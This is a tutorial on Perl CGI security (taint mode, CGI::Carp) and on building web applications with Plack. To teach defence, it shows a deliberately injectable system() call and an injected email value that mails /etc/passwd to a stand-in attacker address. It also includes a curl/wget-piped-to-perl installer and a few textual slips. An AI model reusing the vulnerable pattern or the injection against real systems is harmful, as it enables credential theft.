Basics of Perl web portals

Summary: Perl is a powerful scripting language that can be used to perform small operations from the command line or power a complete web portal. Understanding techniques for making safe and secure Perl CGI scripts is vital to developing a web portal that does not compromise the integrity of a server or the web site's data. This article explains several techniques that will help developers create secure Perl CGI scripts and handle errors, before looking at a simpler method for building web applications like portals using the Plack system.

Tainted information

It sounds like an impossible prospect, but the only way to have completely safe script is to use one that neither uses data from the outside nor uses that data in some external connection or interface (such as running a command or connecting to a database). For some basic scripts, this can be perfectly reasonable.

But for the typical web application, accepting data from a form or other location, and then using that data in some form, is precisely the reason you are using a scripted solution in the first place.

Using such data could have serious consequences. For example, consider the example in Listing 1:

Listing 1. Typical script

#!/usr/bin/perl 
use strict;
use warnings;
use CGI qw/:standard/; 
my $query = new CGI(); 
my $email = $query->param(email); 
system("mail $email") or die "Couldn't open mail"

The script looks harmless enough assuming that we will always get a completely valid email address. But because we are sending email using the system() function, the contents of the email address could be used to compromise the system. For example, imagine if the supplied email address was:

   example@example.com;
    cat /etc/passwd |  mail  hacker@example.com

Now the email address not only contains a (possibly) valid email address but also an instruction to email somebody else your password file. The system() function opens a sub shell and executes the contents. This is a major security problem.

Tracking the origin of different sources of information would be difficult, if it wasn't for a built-in mode provided by Perl called taint mode. Taint mode is automatically enabled if Perl determines that the real and effective user IDs are different, or if you explicitly enabled the mode by using the -T option on the command line or shebang line at the start of the script.

With taint mode enabled, Perl checks the source and use of different data and variables to ensure that the information being used is not opening up the execution of the script to insecure or dangerous operations with information that cannot be trusted. As the name suggests, such data is classified as being tainted.

Perl identifies tainted data as any information that comes from the command line arguments, environment variables, locale information, and certain system calls (including those accessing directory, shared memory, and system data). In addition, all data that is read from an external file is also tainted.

Tainted information cannot be used directly or indirectly in any command that invokes a subshell (including piped input/output and the system() call or exec() calls) or any command that modifies files, or directories (such as writing, deleting or renaming), or processes.

The exceptions to this rule are that print() (and derivatives) and syswrite() do not trigger a tainting error or sub-methods, sub-references, or hash keys.

The tainting functionality also extends automatically to monitor these values that are suspect, even if you don't use them directly. For example, the value of the PATH environment variable is checked whenever you call system() or exec(), regardless of whether you use a tainted variable in the command-line since the command executed will be subject to the value of PATH. ThePATH is checked to ensure that each directory listed in the path is absolute and not writable by people other than the owner and group. This prevents the command you are running from causing further problems.

Perl generates errors and stops execution if taint mode is enabled and it identifies a tainted value being used. For example, using an insecure PATH generates the following error:

Insecure $ENV{PATH} while running with -T switch at t.pl line 11

While using an insecure variable raises this error:

Insecure dependency in system while running with -T switch at t2.pl line 2

Within a typical web application, it is the user supplied data from forms that is tainted, regardless of the method used to collect the information. Data from a CGI script can be obtained either from the standard input or environment variables (depending on the HTTP method and environment used), and both these are classed as tainted sources.

To protect both your script execution and ensure that you are not using insecure data, you need to be able to identify and then de-taint the information so that it is safe to use.

Using CGI::Carp

The normal way of reporting errors within a Perl script is to use the warn() or die() functions to report and generate errors. You might also use the Carp module, which provides additional levels of control over the messages that you raise, particularly within modules.

An additional module, CGI::Carp provides much of the same functionality as the Carp module. It is specially designed to be used within web scripts where you want error information to go to a specific log, rather than the default web server log (for example, one generated by Apache), or where you want the information to go to the web page in a controlled fashion.

The standard Carp module provides alternatives for the warn() and die() functions that provide more information and are more friendly in terms of providing the location of the error. When used within a module, for example, the error message includes the module name and line number.

Within the Carp module, the four main functions are carp(), which is a synonym for a warning message, and croak(), which is like die() and also terminates the script. cluck() and confess() are like warn() and die() respectively but provide a stack back trace from the point where the error was raised.

If you use both the Carp and CGI::Carp modules, then the standard functions, such as warn(), die(), and Carp module functions, croak(), confess(), and carp() will now write their error information out to the configured HTTP server log with a date/time stamp and script source.

An alternative to using the HTTP server error log is to use CGI::Carp and make use of the carpout() function. This accepts a single argument, the filehandle of the file where you want errors (normally sent to STDERR) to be written. You have to import explicitly the carpout() function. You can see a simple example in Listing 2.

Listing 2. Using CGI::Carp

  
#!/usr/bin/perl 
use strict;
use warnings;

use CGI::Carp qw/carpout/; 
use IO::File; 

my $logfile = IO::File->new('browser.log','w')
    or die "Couldn't open logfile: $!\n"; 
    
carpout($logfile); 

warn "Some error must have occurred\n";

The information generated in the log is identified with both the date and the name of the script that generated the output:

[Thu Sep 2 11:35:56 2010] carpout.cgi: Some error must have occurred

All of these standardized methods assume that you want your error information to go to a log file. But, you may not always have access to the logs or want to be logged in to your browser to get the information.

The CGI::Carp function therefore also provides a fatalsToBrowser option that redirects fatal error messages ( die(),confess() ) back to the browser, as well as to the web server log. This ensures that your users see the errors generated by the script. Non-fatal errors (warn() and carp()) will continue to go to the error log as normal.

To use, you must specify it as an option when loading the CGI::Carp module, use CGI::Carp qw/fatalsToBrowser/;. We can add this to our file browsing script to ensure that errors are correctly reported and identified.

Using Plack

The tainting of information, and the use of CGI::Carp, are both low-level issues and that can still be a cause for concern. However, the low-level aspects of CGI applications, such as dealing with query arguments and outputting header material, can be simplified by using one of a number of web application frameworks, such as Catalyst or Dancer. Plack works with frameworks or can be used on its own, as demonstrated below.

Plack is Perl super-glue for web frameworks and web servers. Plack sits between your tex (whether you use a web framework or not) and the web server (for example, Apache, Starman, FCGI). This means that you (and your framework) do not need to worry about specifics of a web server and vice-versa.

Setting up Plack

Let's get you set-up. We are going to use cpanm (from App::cpanminus) to download and install modules into yourlocal::lib (so you do not need root access). This is shown in Listing 3.

Listing 3. Initial setup

# archive of any existing cpan configuration
mv ~/.cpan ~/.cpan_original
 
# Then one of the following:

# if you can run wget
wget -O - http://cpanmin.us/ | perl - local::lib App::cpanminus && echo 'eval
$(perl -I$HOME/perl5/lib/perl5 -Mlocal::lib)' >> ~/.bashrc && . ~/.bashrc
 
# OR if you can run curl
curl -L http://cpanmin.us/ | perl - local::lib App::cpanminus && echo 'eval $(perl
-I$HOME/perl5/lib/perl5 -Mlocal::lib)' >> ~/.bashrc && . ~/.bashrc
 
# otherwise, download the contents of http://cpanmin.us to a file called cpanmin.us,
make it executable and then run: 
./cpanmin.us local::lib App::cpanminus && echo 'eval $(perl -I$HOME/perl5/lib/perl5
-Mlocal::lib)' >> ~/.bashrc && . ~/.bashrc

This installs the core Plack modules that are required to build web applications quickly and easily (see Listing 4 below).

Listing 4. Installing Plack with cpanminus

 
cpanm Task::Plack 
# Please also run this as we will use it later 
cpanm Plack::Middleware::TemplateToolkit

The perl5 folder in your home directory will now have all the modules you need. The next step is to create a .psgi configuration file which will allow us to return a web page (see Listing 5 below).

Listing 5. Creating a .psgi configuration file

 
# Tell Perl where our lib is (ALWAYS use this) 
use lib "$ENV{HOME}/perl5/lib/perl5"; 

# ensure we declare everything correctly (ALWAYS use this) 
use strict; 

# Give us diagnostic warnings where possible (ALWAYS use this) 
use warnings; 

# Allow us to build our application 
use Plack::Builder; 

# A basic app 
my $default_app = sub { 
    my $env = shift; 
    return [ 
        200, # HTTP Status tex 
        [ 'Content-Type' => 'text/html' ], # HTTP Headers, 
        ["All is good"] # Content 
    ];
}; 

# Return the builder 
return builder {
    $default_app; 
}

Save this to a file, called 1.psgi, then use the plackup command to start your web server from the command line as follows:plackup 1.psgi. You will see: HTTP::Server::PSGI: Accepting connections at http://SERVER_IP:5000/.

Using your web browser, go to http://SERVER_IP:5000/. If you are developing on your desktop computer, thenhttp://localhost:5000/ will work. You should now see a page with "All is good". In fact, if you go to any page this is what you will see http://localhost:5000/any_page.html because we are always returning this, irrespective of the request.

You will notice that on the command line you can see the access logs for the web server. This is because Plack defaults to development mode and turns on a few extra middleware layers for you, specifically AccessLog, StackTrace and Lint.

To see StackTrace in operation, comment out line 27 of Listing 4 by adding a hash (#) in front of it: # ["All is good"] # Content.

Restart your plackup command (type Ctrl+C to stop the process, then run plackup 1.psgi to start it). Now, in your web browser go to http://localhost:5000/ again and you will see a StackTrace of the error. Note the main error message at the top of the page "response needs to be 3 element array, or 2 element in streaming". You can then follow each step of the trace, click on the Show function arguments and Show lexical variables links under any section of the trace to help debug the issue.

Remove the # and restart, so we have a working .psgi file again.

Development

There are several command line arguments to the plackup command, running perldoc plackup command will show you the documentation. The most used is -r or --reload; this tells plackup to monitor your .psgi file (if you have a lib directory along side your .psgi file it will also be monitored): plackup -r 1.psgi.

Extending your application

Plack already has many useful applications that you may want to integrate with your web portal. In Listing 6, for example, we are using Plack::App::Directory to get a directory listing and to serve it's content as static files. We will usePlack::App::URLMap to choose which URL we want to mount this application on.

Listing 6. Second .psgi configuration file

 
use lib "$ENV{HOME}/perl5/lib/perl5"; 
use strict; 
use warnings; 
use Plack::Builder; 

# 'mount' applications on specific URLs 
use Plack::App::URLMap; 

# Get directory listings and serve files 
use Plack::App::Directory; 

my $default_app = sub { 
    my $env = shift; 
    return [ 200, [ 'Content-Type' => 'text/html' ], ["All is good"] ];
}; 

# Get the Directory app, configured with a root directory 
my $dir_app = Plack::App::Directory->new( { root => "/tmp/" } )->to_app; 

# Create a mapper object
my $mapper = Plack::App::URLMap->new(); 

# mount our apps on urls 
$mapper->mount('/' => $default_app); 
$mapper->mount('/tmp' => $dir_app); 

# extract the new overall app from the mapper 
my $app = $mapper->to_app(); 

# Return the builder 
return builder { 
    $app; 
}

The tex in Listing 6 mounts $dir_app to /tmp/ ( open http://localhost:5000/tmp/ ) and still falls through to the$default_app for / e.g. any other path ( open http://localhost:500/anything_else.html ).

More middleware and apps

There are many Plack::Apps and Plack::Middleware modules available to help with common tasks. We are going to look atPlack::Middleware::TemplateToolkit, which parses files through the templating engine Template-Toolkit (TT). Images and other static content should not go through TT, so we are going to configure Plack::Middleware::Static to serve files directly with specific extensions. On top of this we want to have a nice looking page when there is a 404 (file not found); for this we will use Plack::Middleware::ErrorDocument. All the tex we need to add is shown in Listing 7.

Listing 7. The Plack::Middleware::TemplateToolkit module

   
    # A link to your htdocs root folder
    my $root = '/path/to/htdocs/';
    
    # Create a new template toolkit application (which we will default to)
    my $default_app = Plack::Middleware::TemplateToolkit->new(
        INCLUDE_PATH => $root,    # Required
    )->to_app();
    
    return builder {

        # Page to show when requested file is missing
        # this will not be processes with TT
        enable "Plack::Middleware::ErrorDocument",
            404 => "$root/page_not_found.html";

        # These files can be served directly
        enable "Plack::Middleware::Static",
            path => qr{[gif|png|jpg|swf|ico|mov|mp3|pdf|js|css]$},
            root => $root;

        # Our application
        $default_app;
    }

At this stage, it is probably worth investigating one of the many web frameworks that offer PSGI support and can be run with Plack. These frameworks offer structure and support for doing more complex tasks. Have a look at Catalyst, Mojolicious, or Dancer. The Perl.org web frameworks white paper (see Resources for a link) discusses just a few of the advantages of using a framework.

Conclusion

Parsing and using web data within a Perl web portal script is complex because of the needs of securing the information that you are receiving from the user. Once you grant access to the underlying filesystem through your Perl script, you must ensure that the CGI script cannot gain access to files that you do not want accessible to the outside world.

Plack doesn't eliminate the need to worry about these elements, but it does make the process of building advanced web applications system much easier. Plack handles all of these issues and provides a simplified environment for building web applications. Plack handles all of the complexities between your web server and your Perl application, both simplifying and protecting your application and server.